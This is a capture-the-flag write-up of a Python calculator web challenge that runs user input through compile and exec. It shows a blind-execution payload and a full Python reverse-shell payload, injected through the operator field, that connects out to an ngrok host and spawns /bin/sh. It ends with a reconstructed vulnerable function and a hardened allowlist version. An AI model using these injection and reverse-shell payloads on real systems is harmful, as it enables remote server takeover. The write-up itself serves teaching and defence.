# Obligatory Calc

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Easy       | 147    | 10     |

## Description

> In every CTF that I've seen \
> There's always a calculator routine \
> It tests our skills and our wit \
> To solve it, we must not quit\
> \
> Poem by ChatGPT

The web application receives user input from a POST request, then uses the `compile` function to generate a code object from the string that represents the arithmetic operation.

<figure><img src="/files/0DxP5dzteT1gZzNwZtvM" alt=""><figcaption></figcaption></figure>

The code object is then executed using the **`exec`** function, and the result is stored in a dictionary called `msg`.

The web application is using the **`compile`** and **`exec`** functions to dynamically generate and execute code based on user input, which could be exploited by an attacker to inject malicious code and execute it.

## Exploiting the vulnerability

Using Burp Suite, I intercepted the request and sent it to Repeater using `Ctrl + R`.

<figure><img src="/files/YjOvCKjVzZgQTIp9gLCV" alt=""><figcaption></figcaption></figure>

Next, I modified `int1=1&operator=%2B&int2=1` into a payload that performs blind code execution:

```
int1=1&operator=*__import__('os').system('python -c "import time;time.sleep(5)"')#&int2=1
```

The web application sleeps for 5 seconds before returning `0`, suggesting that the blind code execution works.

![](/files/X5ifxNxnidAt38OBGI6c)

Modify the payload to a standard Python reverse shell:

```
int1=1&operator=*__import__('os').system('''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ngrok.io",18531));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''')#&int2=1
```

We have successfully shelled the server and gotten the flag.

<figure><img src="/files/dR4rbEJqqzK8kVYfEKN6" alt=""><figcaption></figcaption></figure>
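For the fix, here is an added example (not the challenge's source, which appears only as a screenshot) that puts the `compile`/`exec` pattern described above beside a hardened form that never evaluates user text. The function names, the `op` parameter, the operator set and the digit limit are assumptions, and the injected expression is a constructed, harmless stand-in.

```python
import operator

# Assumed reconstruction of the pattern the write-up describes: the three
# form fields are concatenated into source text, compiled, then exec'd.
def vulnerable_calc(int1: str, op: str, int2: str):
    msg = {}
    code = compile(f"result = {int1}{op}{int2}", "<calc>", "exec")
    exec(code, {}, msg)  # whatever is in the fields runs as Python
    return msg["result"]

# Hardened form: no compile/exec. The operator is looked up in a fixed
# allowlist and operands must parse as bounded decimal integers.
ALLOWED_OPS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}
MAX_DIGITS = 18  # arbitrary bound so huge operands cannot burn CPU

def parse_operand(raw: str) -> int:
    text = raw.strip()
    digits = text[1:] if text[:1] in "+-" else text
    if not (digits.isascii() and digits.isdigit() and len(digits) <= MAX_DIGITS):
        raise ValueError("operand must be a decimal integer")
    return int(text)

def safe_calc(int1: str, op: str, int2: str):
    func = ALLOWED_OPS.get(op)
    if func is None:
        raise ValueError("unsupported operator")
    a, b = parse_operand(int1), parse_operand(int2)
    if func is operator.truediv and b == 0:
        raise ValueError("division by zero")
    return func(a, b)

if __name__ == "__main__":
    # Constructed input with the same shape as the operator field abused above.
    injected = "*__import__('os').getpid()#"
    print("vulnerable:", vulnerable_calc("1", injected, "1"))  # runs the call
    try:
        safe_calc("1", injected, "1")
    except ValueError as exc:
        print("hardened:", exc)
```

Restricting `exec` globals or filtering keywords is not an equivalent fix; the hardened version works because the request fields are only ever treated as data.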

